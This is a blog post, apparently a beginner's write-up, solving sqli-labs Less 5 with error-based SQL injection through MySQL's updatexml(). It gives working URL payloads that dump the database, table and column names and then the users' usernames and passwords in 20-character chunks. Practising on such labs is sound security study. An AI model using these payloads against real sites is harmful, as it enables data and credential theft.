sqli-lab 5(报错注入)冲关记录
时隔好久,这个less5卡了我好久
走了好多弯路
终于被我发现了一条最舒服的道路
今日一冲!
less 5
首先尝试1’
直接报错
但是这个报错信息看上去很简单
回显是you are in…
尝试正常查询
回显始终只有"You are in…"
这一关对于刚学的我来说有点崩溃,弄了好久,走了好多弯路
我们可以用报错注入和布尔型注入
接下来我们需要进行报错注入(布尔型注入太麻烦了)
updatexml()这个是比较常用的报错注入(简单,常用,适合我这样的菜狗)
但是其他的报错注入最好也学会,因为常用难免会被过滤
虽然盲注回显令人很痛苦但是我们面对什么样的困难,都要勇于面对。
所以我们利用它的报错回显进行查询
updatexml(1,concat(’~’, ,’~’),1)将会是我们比较常用的一种报错注入的格式,需要掌握
?id=1’ and updatexml(1,concat(’’,database(),’’),1) --+
出现了报错其中~~中的内容就是我们所查询的内容
接下来又是同样的方法
查表名:?id=1’ and updatexml(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),’~’),1) --+
查列名:?id=1’ and updatexml(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),’~’),1) --+
查内容:?id=1’ and updatexml(1,concat(’~’,substr((select group_concat(username,’ ‘,password) from users),1,20),’~’),1) --+
由于报错查询会限制显示的长度,所以我们需要substr,left,right等函数来辅助查询
后面将substr的第二个参数不断后移+20即可一段一段回显
很明显回显有残缺,不要害怕,按照上述修改substr的第二个参数即可一步一步查全。
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
